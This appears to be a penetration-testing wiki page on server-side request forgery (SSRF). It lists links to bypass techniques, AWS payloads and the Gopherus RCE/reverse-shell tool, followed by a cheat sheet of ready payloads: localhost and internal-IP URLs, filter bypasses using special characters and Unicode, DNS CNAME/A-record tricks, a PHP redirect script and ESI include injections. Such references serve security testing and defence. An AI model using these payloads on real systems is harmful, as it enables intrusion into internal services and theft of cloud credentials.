SSRF
What is it?
Exploitation
Bypass SSRF Protection using Domain CNAME A Record: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-domain-cname-arecord.html
Bypass SSRF Protection using HTTP Redirect: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-http-redirect.html
Payloads
SSRF Payloads for AWS: https://github.com/cybercdh/hacks/blob/master/ssrf_payloads/aws
Tools
Gopherus: https://github.com/tarunkant/Gopherus
This tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server.
Cheat Sheet
Basic Attack [ref1]
?url=http://localhost/server-status
?url=http://127.0.0.1/server-status
?url=http://internal_domain/page
?url=http://internal_ip(192.138.0.14)/page
Bypass SSRF with special char [ref1]
?url=http://allow_domain.internal_domain_or_ip/page
?url=http://allow_domain@internal_domain_or_ip/page
?url=http://internal_domain_or_ip#.allow_domain/page
?url=http://internal_domain_or_ip?.allow_domain/page
?url=http://internal_domain_or_ip\.allow_domain/page
?url=https://ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ = www.hahwul.com
[ List ]
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Bypass SSRF Domain CNAME & A-Record [ref1]
[ CNAME ]
http://localhost.hahwul.com/server-status
$ nslookup localhost.hahwul.com
localhost.hahwul.com canonical name = localhost.
Name: localhost
Address: 127.0.0.1
[ A-Record ]
http://127.hahwul.com/server-status
Bypass SSRF HTTP Redirect [ref1]
?url=http://your-domain/r.php
[ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>
SSRF with ESIi [ref1]
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>
Other Resources
Hahwul's SSRF cheatsheet: https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests. https://gist.github.com/hussein98d/d09b5990ff339dac8029b1e9248d2875
References
[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1
Last updated
Was this helpful?